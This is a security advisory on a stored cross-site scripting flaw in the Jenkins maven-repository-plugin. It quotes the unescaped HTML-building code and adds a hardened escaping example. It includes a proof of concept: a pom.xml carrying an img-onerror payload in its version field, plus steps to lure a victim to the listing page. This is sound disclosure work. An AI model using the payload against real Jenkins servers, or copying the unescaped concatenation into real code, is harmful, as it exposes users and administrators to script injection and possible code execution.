Coordinated Disclosure Timeline

Summary

A stored Cross-Site Scripting (XSS) vulnerability was found in the maven-repository-plugin project.

Product

maven-repository-plugin

Tested Version

1.10

Details

Stored Cross-Site Scripting (GHSL-2023-097)

The Head#generateDirectoryListing method builds an HTML directory listing by concatenating user-controllable data into the response without escaping it:

    protected void generateDirectoryListing(IDavContext ctxt, IDavCollection item) throws IOException {
        PrintWriter writer = this.getResponse().getWriter();
        String name = item.getName();
        if( name == null )
            name = "Repository";
        writer.write("<HTML>");
        // collection name written as raw HTML
        writer.write("<H1>" + name + "</H1>");
        writer.write("<TABLE>");
        for (IDavItem cItem : item.getChildren(ctxt)) {
            writer.write("<TR>");
            writer.write("<TD>" + cItem.getLastModified().toString() + "</TD>");

            if (cItem instanceof IDavFile) {
                IDavFile file = (IDavFile) cItem;

                writer.write("<TD>" + file.getContentLength() + "</TD>");

                // file name written unescaped into both the href attribute and the link text
                writer.write("<TD><A href='" +  file.getName() + "'>" + file.getName() + "</A></TD>");
                if (file.isLocked(ctxt))
                    writer.write("<TD>(Locked)</TD>");
                else
                    writer.write("<TD></TD>");
            } else {
                IDavCollection dir = (IDavCollection) cItem;

                writer.write("<TD>DIR</TD>");
                // directory name written unescaped into both the href attribute and the link text
                writer.write("<TD><A href='" + dir.getName() + "/'>" + dir.getName() + "</A></TD>");
                writer.write("<TD></TD>");
            }
            writer.write("</TR>");
        }
        writer.write("</TABLE>");
        writer.write("</HTML>");
    }

An attacker with Job/Configure permissions can create a Maven project and control the values returned by dir.getName() and file.getName(), since those names are derived from the Maven artifacts the build produces.
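As an added example that is not part of the plugin's code or of this advisory, the class below renders the same directory listing with every name HTML-escaped before it reaches the attribute and text positions that the vulnerable method leaves raw. The plugin's IDavItem/IDavFile/IDavCollection interfaces are replaced by a constructed Entry record, escapeHtml is a hypothetical minimal escaper (a Jenkins plugin would normally call hudson.Util.escape from Jenkins core instead), and the sample directory name is the advisory's own payload.

```java
import java.util.List;

/**
 * Added example (not from the plugin): a hardened directory listing that
 * escapes every user-controllable value before concatenating it into HTML.
 */
public class SafeDirectoryListing {

    /** Minimal escaper for HTML text nodes and double-quoted attribute values (hypothetical helper). */
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Constructed stand-in for one DAV child: its name, whether it is a file, and its length. */
    record Entry(String name, boolean isFile, long length) {}

    /** Same layout as the vulnerable listing, but each name is escaped exactly once per position. */
    static String render(String collectionName, List<Entry> children) {
        String name = collectionName == null ? "Repository" : collectionName;
        StringBuilder out = new StringBuilder();
        out.append("<HTML>");
        out.append("<H1>").append(escapeHtml(name)).append("</H1>");
        out.append("<TABLE>");
        for (Entry e : children) {
            String safe = escapeHtml(e.name());
            out.append("<TR>");
            if (e.isFile()) {
                out.append("<TD>").append(e.length()).append("</TD>");
                out.append("<TD><A href=\"").append(safe).append("\">").append(safe).append("</A></TD>");
            } else {
                out.append("<TD>DIR</TD>");
                out.append("<TD><A href=\"").append(safe).append("/\">").append(safe).append("</A></TD>");
            }
            out.append("</TR>");
        }
        out.append("</TABLE></HTML>");
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed input: a directory whose name is the payload from the advisory.
        List<Entry> children = List.of(new Entry("<img src=x onerror=alert()>", false, 0));
        String html = render("payload", children);
        System.out.println(html);
        // The raw tag must not survive; only its escaped form may appear.
        if (html.contains("<img") || !html.contains("&lt;img src=x onerror=alert()&gt;")) {
            throw new IllegalStateException("escaping failed");
        }
    }
}
```

The href is now double-quoted and the escaper encodes both quote characters, so a crafted name can neither inject a tag into the text node nor break out of the attribute. Compile with javac SafeDirectoryListing.java (Java 16 or later, for the record) and run with java SafeDirectoryListing.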

Proof of concept

    <project>
        <modelVersion>4.0.0</modelVersion>
        <groupId>com.pwntester</groupId>
        <artifactId>payload</artifactId>
        <version><![CDATA[<img src=x onerror=alert()>]]></version>
        <!-- the element names for the two trailing "test" values were lost in extraction; name and description are assumed -->
        <name>test</name>
        <description>test</description>
    </project>

Note that the XSS payload was included in the artifact version.

- Build the project so that the artifacts are produced and stored in the workspace
- Send the victim the following link

    http://localhost:8080/jenkins/job/test/1/maven-repository/repository/com/pwntester/payload/

Note: Change test to the project name, 1 to the build number, and com/pwntester/payload to the groupId/artifactId specified in the pom.xml.

Impact

This issue may lead to Cross-Site Scripting and, if targeted at an administrator, it can be escalated to Remote Code Execution (RCE).

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-097 in any communication regarding this issue.